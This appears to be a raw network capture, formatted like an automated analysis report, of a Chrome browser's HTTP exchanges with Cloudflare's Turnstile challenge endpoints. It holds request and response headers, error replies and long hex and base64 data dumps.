                                                          2025-01-16 04:17:36 UTC1369INData Raw: 46 78 68 72 4b 31 67 72 72 42 2f 69 71 2b 79 6e 34 4f 54 63 6e 57 71 72 6f 78 37 6a 34 69 5a 69 5a 65 37 73 58 65 41 73 4a 76 48 76 63 53 56 6e 59 53 4e 75 34 79 39 6a 5a 53 32 31 38 69 70 30 63 69 58 32 62 69 32 76 62 6a 4a 73 37 4f 7a 74 4c 48 6f 73 4f 58 63 33 36 54 48 71 73 58 4b 33 38 2f 30 37 75 2f 58 37 73 2f 50 79 73 72 59 36 63 66 77 2b 66 72 63 30 64 55 41 30 73 4c 35 78 74 7a 49 31 50 6b 4b 34 67 6a 68 34 2b 72 68 36 68 6a 58 43 76 44 76 39 67 59 58 45 78 66 7a 45 78 58 66 48 51 48 69 2f 53 41 72 38 77 51 6a 4c 79 34 71 4b 54 4d 4d 36 69 30 33 45 51 51 78 4f 78 55 59 4e 54 38 64 4c 6a 54 35 43 78 6f 7a 51 30 63 6d 47 54 74 4c 52 53 51 69 53 6c 45 4d 49 68 41 69 56 6a 4e 52 54 30 6c 61 58 45 34 6c 52 78 74 54 4c 46 77 77 59 53 34 37 58 55 4e 52
                                                          Data Ascii: FxhrK1grrB/iq+yn4OTcnWqrox7j4iZiZe7sXeAsJvHvcSVnYSNu4y9jZS218ip0ciX2bi2vbjJs7OztLHosOXc36THqsXK38/07u/X7s/PysrY6cfw+frc0dUA0sL5xtzI1PkK4gjh4+rh6hjXCvDv9gYXExfzExXfHQHi/SAr8wQjLy4qKTMM6i03EQQxOxUYNT8dLjT5CxozQ0cmGTtLRSQiSlEMIhAiVjNRT0laXE4lRxtTLFwwYS47XUNR
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 2b 52 61 33 79 31 71 4b 4f 4b 75 4c 47 70 72 59 36 58 6e 59 79 7a 76 59 2b 7a 76 62 36 62 75 37 61 47 67 4a 53 32 6e 5a 2f 4a 71 36 6e 47 72 4c 53 32 6f 71 72 41 6c 37 4c 5a 74 36 32 65 6e 63 71 58 6d 4c 7a 50 78 4d 4f 6b 77 4e 47 33 70 64 6a 62 32 36 7a 5a 73 4f 44 73 39 66 50 54 73 2f 6e 45 2b 65 58 50 7a 63 62 66 30 2f 48 2b 2f 74 76 5a 35 50 30 46 2f 74 4c 7a 79 4f 6e 75 39 2b 6f 4f 34 67 37 30 2f 68 49 55 38 78 6b 51 37 74 66 33 41 42 45 64 43 68 55 6a 47 68 34 52 4a 68 2f 37 2f 75 6f 71 41 43 6e 6d 4d 41 51 74 36 76 51 49 4d 65 38 43 44 44 58 7a 43 68 41 35 39 68 49 55 50 66 6f 61 47 45 48 2b 49 68 78 46 41 79 6f 67 53 51 63 79 4a 45 30 4c 51 43 68 52 44 30 67 73 56 52 4e 51 4d 46 6b 59 56 7a 4e 4f 50 44 42 63 4f 69 64 63 57 6a 73 72 5a 57 39 77 52
                                                          Data Ascii: +Ra3y1qKOKuLGprY6XnYyzvY+zvb6bu7aGgJS2nZ/Jq6nGrLS2oqrAl7LZt62encqXmLzPxMOkwNG3pdjb26zZsODs9fPTs/nE+eXPzcbf0/H+/tvZ5P0F/tLzyOnu9+oO4g70/hIU8xkQ7tf3ABEdChUjGh4RJh/7/uoqACnmMAQt6vQIMe8CDDXzChA59hIUPfoaGEH+IhxFAyogSQcyJE0LQChRD0gsVRNQMFkYVzNOPDBcOidcWjsrZW9wR
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 42 74 70 4e 35 71 71 71 38 6d 62 47 49 71 58 6d 6a 75 70 57 79 6c 38 44 47 68 36 43 4c 6a 61 79 58 68 39 47 69 77 4d 6d 6d 30 61 43 34 70 38 76 4b 33 64 4f 77 7a 5a 61 79 76 4d 44 4d 33 73 62 45 75 64 71 30 33 74 37 4b 35 4c 2f 68 37 75 4c 62 78 75 62 51 38 4d 2f 4e 38 76 66 7a 32 50 54 71 33 76 69 35 37 66 4c 52 76 4f 54 70 32 73 72 55 42 39 6a 6d 32 73 62 6d 45 67 34 50 42 74 37 31 39 78 6a 4d 36 39 49 56 39 68 7a 32 38 2f 62 61 49 78 6a 65 39 53 48 37 45 77 4c 36 33 77 38 48 4a 77 44 2b 2f 65 34 41 38 79 45 35 45 68 6f 52 44 7a 55 4b 49 54 76 7a 46 6a 4d 6c 2f 43 4d 5a 51 53 51 73 51 6b 6f 41 44 6b 41 6f 4d 77 78 44 4b 68 4e 50 4d 7a 67 69 55 79 34 64 4c 78 70 51 4f 44 52 64 49 32 5a 48 57 55 5a 52 58 69 4e 4a 62 6b 74 6d 59 53 78 53 4c 30 46 6c 55 48
                                                          Data Ascii: BtpN5qqq8mbGIqXmjupWyl8DGh6CLjayXh9GiwMmm0aC4p8vK3dOwzZayvMDM3sbEudq03t7K5L/h7uLbxubQ8M/N8vfz2PTq3vi57fLRvOTp2srUB9jm2sbmEg4PBt719xjM69IV9hz28/baIxje9SH7EwL63w8HJwD+/e4A8yE5EhoRDzUKITvzFjMl/CMZQSQsQkoADkAoMwxDKhNPMzgiUy4dLxpQODRdI2ZHWUZRXiNJbktmYSxSL0FlUH
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 72 6f 2b 4b 67 62 64 37 6e 4a 69 54 6f 4b 69 6c 6f 71 4f 64 77 62 65 71 71 59 32 6f 30 72 4b 79 73 62 43 71 71 4d 71 72 70 70 33 54 6c 37 69 35 73 62 7a 45 77 62 36 2f 75 64 33 54 78 4e 57 6c 78 4f 37 4f 7a 73 33 4d 78 73 54 6d 78 4d 7a 7a 39 38 61 38 32 76 32 36 30 2f 76 79 77 66 48 45 32 2b 4c 63 76 39 6f 4b 79 76 33 6c 42 64 76 36 34 50 76 65 35 67 59 59 35 52 51 4c 32 2b 7a 70 38 39 58 78 46 52 41 55 32 75 33 2b 2f 43 63 6d 36 53 51 4c 44 51 4d 59 49 76 72 77 4e 65 30 6e 46 67 4d 59 4f 6a 49 4e 4a 7a 6f 37 2f 55 48 33 48 7a 31 47 50 79 51 45 53 69 63 43 44 41 4d 5a 4f 45 67 69 42 43 63 64 55 54 63 6e 49 45 73 70 4b 30 6b 50 54 68 55 77 4d 79 45 79 51 56 46 50 58 53 56 48 57 6d 4d 30 53 32 73 33 62 53 68 44 54 48 56 6d 64 48 55 30 63 45 34 78 65 6b 39
                                                          Data Ascii: ro+Kgbd7nJiToKiloqOdwbeqqY2o0rKysbCqqMqrpp3Tl7i5sbzEwb6/ud3TxNWlxO7Ozs3MxsTmxMzz98a82v260/vywfHE2+Lcv9oKyv3lBdv64Pve5gYY5RQL2+zp89XxFRAU2u3+/Ccm6SQLDQMYIvrwNe0nFgMYOjINJzo7/UH3Hz1GPyQESicCDAMZOEgiBCcdUTcnIEspK0kPThUwMyEyQVFPXSVHWmM0S2s3bShDTHVmdHU0cE4xek9
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 6e 35 2b 66 5a 48 48 6c 5a 2b 4a 70 36 65 38 75 39 43 50 6d 36 4c 53 30 37 47 76 77 36 2f 49 72 74 62 52 33 35 32 66 33 37 61 6b 76 2b 4f 39 34 38 6a 66 31 73 75 39 70 74 71 72 75 39 76 72 78 61 66 4b 77 50 54 61 79 73 50 75 7a 4d 37 73 73 76 47 34 30 39 62 45 31 65 54 30 39 51 4c 65 78 73 33 59 36 2f 72 4d 30 65 66 71 2f 66 48 75 31 2b 4d 4f 2b 74 6a 55 38 65 66 7a 2b 39 77 65 45 52 49 44 46 53 62 37 43 67 63 56 44 52 6b 48 2b 67 59 30 4b 77 59 44 39 76 45 49 4d 41 4d 6b 37 76 30 50 41 44 2f 35 41 6a 30 50 4a 52 70 42 52 51 6c 49 42 42 38 4e 44 41 67 39 50 41 6f 55 4b 43 42 58 4a 68 5a 4b 53 45 30 6c 52 31 4d 36 4b 54 4d 73 5a 44 4a 67 56 44 30 37 59 44 5a 6f 56 79 42 5a 52 57 74 45 61 46 4e 57 56 54 5a 48 51 55 35 38 63 30 35 4c 50 7a 70 51 65 45 74 73
                                                          Data Ascii: n5+fZHHlZ+Jp6e8u9CPm6LS07Gvw6/IrtbR352f37akv+O948jf1su9ptqru9vrxafKwPTaysPuzM7ssvG409bE1eT09QLexs3Y6/rM0efq/fHu1+MO+tjU8efz+9weERIDFSb7CgcVDRkH+gY0KwYD9vEIMAMk7v0PAD/5Aj0PJRpBRQlIBB8NDAg9PAoUKCBXJhZKSE0lR1M6KTMsZDJgVD07YDZoVyBZRWtEaFNWVTZHQU58c05LPzpQeEts


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449761104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:36 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:36 UTC442INHTTP/1.1 400 Bad Request
                                                          Date: Thu, 16 Jan 2025 04:17:36 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 14
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: l3JbJU1YYRPjs31rgghkB6FuSx/ENDdt1dxfe+I6Z6OM9QkeI7glLcxamrmz90BH6bFpToiot5WLOI5T96mrbw==$yTZ4U+nx0fEssFvsPFyq7g==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bfd4fe88c75-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:36 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                          Data Ascii: {"err":100230}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449762104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:37 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/902b4be51ba27c69/1737001055934/36f62fcfb6f95c96a2b2b00887c1bcc63a0f7e0720358c000f011a9560ba8db2/gwoEUwYPSddrPVq HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:37 UTC143INHTTP/1.1 401 Unauthorized
                                                          Date: Thu, 16 Jan 2025 04:17:37 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 1
                                                          Connection: close
                                                          2025-01-16 04:17:37 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 76 59 76 7a 37 62 35 58 4a 61 69 73 72 41 49 68 38 47 38 78 6a 6f 50 66 67 63 67 4e 59 77 41 44 77 45 61 6c 57 43 36 6a 62 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNvYvz7b5XJaisrAIh8G8xjoPfgcgNYwADwEalWC6jbIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                          2025-01-16 04:17:37 UTC1INData Raw: 4a
                                                          Data Ascii: J


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.449766104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:38 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/902b4be51ba27c69/1737001055937/ICE5gX1v93RNlWk HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:38 UTC200INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:38 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c06cd2641ba-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 05 08 02 00 00 00 ce 94 8b 59 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRYIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.449768104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:38 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 32908
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 1
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:38 UTC16384OUTData Raw: 76 5f 39 30 32 62 34 62 65 35 31 62 61 32 37 63 36 39 3d 6b 33 6d 6a 37 38 30 35 49 76 33 62 33 62 72 33 30 53 30 76 7a 6f 30 7a 32 65 30 67 62 66 6a 76 24 49 62 51 46 62 64 6a 39 24 33 32 70 62 79 6a 24 73 30 4a 46 62 74 6a 6d 6d 38 58 4e 6d 62 6b 38 62 30 6b 46 6b 62 53 33 62 74 62 38 73 4f 62 4e 6a 43 76 4f 6e 53 77 6f 62 59 62 32 73 38 45 62 32 6a 46 24 62 48 25 32 62 6d 30 2b 62 75 71 53 50 6d 4f 30 6a 32 5a 63 62 51 73 38 51 62 45 7a 55 71 6d 62 5a 4e 33 62 5a 62 24 49 62 79 52 45 2b 6a 6f 62 62 4f 49 62 65 72 6f 62 30 57 5a 77 73 30 69 5a 6f 62 39 50 50 36 6e 77 4d 31 50 6e 30 36 30 30 24 51 7a 57 61 61 5a 65 2d 37 33 67 7a 7a 4f 48 30 43 46 38 6d 70 53 50 71 6a 62 6f 2d 37 5a 30 43 73 32 62 2d 47 5a 53 41 33 46 70 44 44 62 71 54 44 65 68 54 66 56
                                                          Data Ascii: v_902b4be51ba27c69=k3mj7805Iv3b3br30S0vzo0z2e0gbfjv$IbQFbdj9$32pbyj$s0JFbtjmm8XNmbk8b0kFkbS3btb8sObNjCvOnSwobYb2s8Eb2jF$bH%2bm0+buqSPmO0j2ZcbQs8QbEzUqmbZN3bZb$IbyRE+jobbOIberob0WZws0iZob9PP6nwM1Pn0600$QzWaaZe-73gzzOH0CF8mpSPqjbo-7Z0Cs2b-GZSA3FpDDbqTDehTfV
                                                          2025-01-16 04:17:38 UTC16384OUTData Raw: 62 4b 41 69 55 62 4f 32 58 47 41 61 43 53 36 6a 24 4c 69 6e 67 62 62 30 30 4f 62 70 62 38 6a 62 30 62 50 58 32 62 62 63 4a 47 62 32 6f 62 63 62 46 62 45 49 32 7a 62 64 62 62 73 30 70 62 47 62 45 49 30 35 62 78 62 76 4e 38 70 62 31 6a 32 6d 32 65 6d 24 6a 30 49 30 6e 6a 6d 62 77 49 38 65 62 61 6a 65 4f 62 76 62 57 6a 6d 33 32 45 62 7a 62 45 33 62 6a 62 6e 73 45 73 62 4a 62 39 6a 38 62 30 49 7a 73 36 39 49 38 47 62 4f 62 61 70 38 72 30 76 38 62 73 43 76 30 42 62 75 73 43 4a 63 6d 53 30 73 77 36 30 37 62 35 73 77 72 30 37 62 52 37 32 47 73 32 6f 43 33 30 7a 6f 2b 72 45 31 71 46 6a 34 51 62 62 30 58 56 46 61 6d 65 77 4a 52 73 45 7a 32 46 6a 76 62 38 6d 38 46 30 58 6a 51 6d 38 24 30 46 6a 52 6d 77 42 62 66 6a 51 49 53 2b 4f 58 49 76 7a 32 46 6a 62 65 32 49 53
                                                          Data Ascii: bKAiUbO2XGAaCS6j$Lingbb00Obpb8jb0bPX2bbcJGb2obcbFbEI2zbdbbs0pbGbEI05bxbvN8pb1j2m2em$j0I0njmbwI8ebajeObvbWjm32EbzbE3bjbnsEsbJb9j8b0Izs69I8GbObap8r0v8bsCv0BbusCJcmS0sw607b5swr07bR72Gs2oC30zo+rE1qFj4Qbb0XVFamewJRsEz2Fjvb8m8F0XjQm8$0FjRmwBbfjQIS+OXIvz2Fjbe2IS
                                                          2025-01-16 04:17:38 UTC140OUTData Raw: 53 2d 37 43 38 62 39 72 38 72 4e 75 54 2b 69 4e 43 62 35 41 77 6f 32 38 79 41 54 2d 53 30 6a 65 4f 73 51 32 36 32 73 46 30 66 76 4b 4a 62 66 55 66 38 49 6d 62 32 67 64 6f 65 55 39 66 55 68 6d 47 31 62 33 2b 56 39 2b 31 77 63 62 62 7a 55 54 6a 51 62 61 57 42 61 30 76 4c 44 2b 38 64 6f 4c 7a 24 45 71 6b 46 6e 52 39 77 6e 4e 31 58 42 46 37 32 75 53 51 42 67 48 57 36 4a 4d 52 32 45 30 6d 6a 44 6d 45 70 38 54 69 6f 62 62
                                                          Data Ascii: S-7C8b9r8rNuT+iNCb5Awo28yAT-S0jeOsQ262sF0fvKJbfUf8Imb2gdoeU9fUhmG1b3+V9+1wcbbzUTjQbaWBa0vLD+8doLz$EqkFnR9wnN1XBF72uSQBgHW6JMR2E0mjDmEp8Tiobb
                                                          2025-01-16 04:17:39 UTC322INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:39 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 26364
                                                          Connection: close
                                                          cf-chl-gen: 0z9vcwlAzU+/4dAWR1zsEbTN3StQG7S5urBCZlZdzEiHg26n0XrXAL7/APaoarAJ$ltxMJ3Q+fvVcaPYci+WWfg==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c0ace1318bc-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:39 UTC1047INData Raw: 6b 6e 37 48 6c 4a 53 57 70 36 4b 6e 6d 5a 2b 6b 72 62 37 52 69 59 7a 55 77 4e 53 30 6b 62 72 59 75 4a 58 64 7a 62 4f 5a 6f 71 2b 2b 75 36 4f 65 33 4b 48 54 36 4c 65 31 71 64 43 38 34 4f 7a 6a 39 64 50 4b 36 62 54 50 39 2f 43 38 36 62 6a 79 76 66 37 62 36 2f 6e 44 32 74 44 67 35 39 66 7a 36 2b 76 6d 34 51 2f 69 35 77 4c 68 42 52 48 7a 35 50 4d 52 35 50 6a 61 37 42 7a 59 43 79 51 43 37 66 4d 65 4b 4e 38 70 35 65 6b 46 48 77 41 4e 41 53 67 47 4c 42 2f 31 43 78 49 53 38 52 67 49 44 67 77 4d 4b 78 34 66 50 68 45 65 48 44 37 2b 41 45 6f 58 53 79 70 42 4f 6a 74 44 49 55 73 75 4c 44 46 56 46 46 70 4b 53 31 52 46 54 31 30 33 4b 55 42 69 49 31 67 33 4a 46 30 6c 57 6c 56 71 51 47 34 2f 59 30 55 2f 59 57 35 49 55 55 74 6b 57 47 6b 35 56 57 6b 2b 63 6b 78 61 55 32 35
                                                          Data Ascii: kn7HlJSWp6KnmZ+krb7RiYzUwNS0kbrYuJXdzbOZoq++u6Oe3KHT6Le1qdC84Ozj9dPK6bTP9/C86bjyvf7b6/nD2tDg59fz6+vm4Q/i5wLhBRHz5PMR5Pja7BzYCyQC7fMeKN8p5ekFHwANASgGLB/1CxIS8RgIDgwMKx4fPhEeHD7+AEoXSypBOjtDIUsuLDFVFFpKS1RFT103KUBiI1g3JF0lWlVqQG4/Y0U/YW5IUUtkWGk5VWk+ckxaU25
                                                          2025-01-16 04:17:39 UTC1369INData Raw: 49 73 64 53 73 74 38 57 7a 79 4c 6a 61 76 4f 44 4d 76 39 66 6c 73 4c 4f 6e 35 65 62 57 77 63 62 68 77 2b 50 51 72 4f 76 52 33 38 62 77 2b 38 58 55 38 77 43 34 39 76 53 36 79 39 72 7a 42 41 6a 6d 32 66 73 4d 42 75 54 69 33 67 6e 62 42 78 4d 4d 33 39 4c 50 44 75 54 73 37 51 6b 4b 46 66 33 53 45 42 37 75 34 77 54 75 47 77 6b 65 39 67 6f 74 49 53 2f 36 38 42 34 6a 38 50 34 73 4a 78 55 78 4e 53 6f 59 4d 52 49 52 48 68 6f 67 4d 54 51 62 39 78 67 2b 51 52 38 64 52 67 78 4d 47 69 6b 2f 47 6b 46 52 4a 54 4e 48 4c 69 49 74 56 79 51 71 57 6a 67 72 51 56 46 5a 58 56 4e 59 4d 6b 6c 62 57 47 41 32 51 54 34 35 61 56 6c 4c 52 53 31 4f 4c 6a 39 6d 55 58 52 76 55 45 31 53 53 31 52 78 4e 46 39 50 57 33 56 61 65 57 70 66 59 34 5a 4a 65 46 39 38 68 6f 39 67 6b 35 57 41 65 49
                                                          Data Ascii: IsdSst8WzyLjavODMv9flsLOn5ebWwcbhw+PQrOvR38bw+8XU8wC49vS6y9rzBAjm2fsMBuTi3gnbBxMM39LPDuTs7QkKFf3SEB7u4wTuGwke9gotIS/68B4j8P4sJxUxNSoYMRIRHhogMTQb9xg+QR8dRgxMGik/GkFRJTNHLiItVyQqWjgrQVFZXVNYMklbWGA2QT45aVlLRS1OLj9mUXRvUE1SS1RxNF9PW3VaeWpfY4ZJeF98ho9gk5WAeI
                                                          2025-01-16 04:17:39 UTC1369INData Raw: 6b 64 7a 4f 6e 2b 4c 64 74 4e 6e 42 75 4e 36 79 33 75 53 31 37 36 75 39 77 73 62 65 79 50 58 6d 35 37 69 33 35 75 66 39 36 72 71 2b 2f 51 50 43 77 4d 33 63 77 37 2f 6f 2b 39 4d 4b 34 41 76 6a 32 39 6b 4a 2b 67 55 43 33 65 51 51 47 51 33 54 42 77 67 47 36 65 33 7a 38 39 33 73 45 68 51 45 2b 69 44 78 45 77 50 6d 47 75 6f 6f 37 75 50 6f 4b 67 30 30 43 2f 63 46 44 54 41 31 39 6a 45 2f 4b 67 38 75 48 42 4d 50 45 54 6b 44 4f 7a 59 64 41 79 45 49 4a 56 41 35 45 43 70 54 46 53 4e 42 4e 6c 6b 7a 53 31 74 62 54 53 6f 37 47 53 74 45 51 45 45 68 59 30 4d 67 56 30 52 4c 4f 6d 52 68 55 47 74 63 53 45 35 53 52 31 46 54 4d 55 74 4b 4d 31 70 39 61 6e 45 7a 64 58 52 31 56 6f 57 49 51 6c 4a 42 69 33 5a 57 59 6b 6c 71 5a 49 70 54 61 6d 6c 55 6a 49 78 79 62 35 57 50 69 47 35
                                                          Data Ascii: kdzOn+LdtNnBuN6y3uS176u9wsbeyPXm57i35uf96rq+/QPCwM3cw7/o+9MK4Avj29kJ+gUC3eQQGQ3TBwgG6e3z893sEhQE+iDxEwPmGuoo7uPoKg00C/cFDTA19jE/Kg8uHBMPETkDOzYdAyEIJVA5ECpTFSNBNlkzS1tbTSo7GStEQEEhY0MgV0RLOmRhUGtcSE5SR1FTMUtKM1p9anEzdXR1VoWIQlJBi3ZWYklqZIpTamlUjIxyb5WPiG5
                                                          2025-01-16 04:17:39 UTC1369INData Raw: 4c 6a 68 70 2b 66 45 70 4c 71 71 78 4f 33 41 35 4f 62 50 79 75 76 55 74 73 54 7a 73 2f 58 4d 2f 4c 66 54 79 4c 75 37 31 38 7a 44 39 51 54 53 2b 75 72 70 31 41 66 34 78 77 4c 36 44 78 4c 39 35 39 59 47 7a 39 54 75 35 50 51 55 36 65 7a 70 36 64 38 43 45 76 76 65 43 66 63 48 48 78 6b 4e 2b 75 73 63 44 77 76 71 42 53 38 52 43 78 58 77 43 69 6f 50 4a 68 41 50 4e 44 59 32 44 44 73 67 42 53 49 56 48 30 45 54 51 77 6b 45 51 55 59 76 43 52 73 7a 4d 44 51 6b 46 69 30 59 4b 54 45 5a 4a 6c 67 58 47 78 51 73 50 42 35 47 55 47 59 6e 55 6c 6c 67 50 7a 59 2f 58 6d 56 61 53 57 4e 71 52 6d 67 77 5a 48 42 57 58 58 46 31 67 45 6c 2f 65 49 53 45 57 58 36 49 59 6d 57 43 6a 47 70 37 67 55 64 59 5a 34 43 51 6c 48 4e 6d 69 4a 69 53 63 57 39 4f 6e 48 36 64 66 47 36 6a 6c 6d 79 69
                                                          Data Ascii: Ljhp+fEpLqqxO3A5ObPyuvUtsTzs/XM/LfTyLu718zD9QTS+urp1Af4xwL6DxL959YGz9Tu5PQU6ezp6d8CEvveCfcHHxkN+uscDwvqBS8RCxXwCioPJhAPNDY2DDsgBSIVH0ETQwkEQUYvCRszMDQkFi0YKTEZJlgXGxQsPB5GUGYnUllgPzY/XmVaSWNqRmgwZHBWXXF1gEl/eISEWX6IYmWCjGp7gUdYZ4CQlHNmiJiScW9OnH6dfG6jlmyi
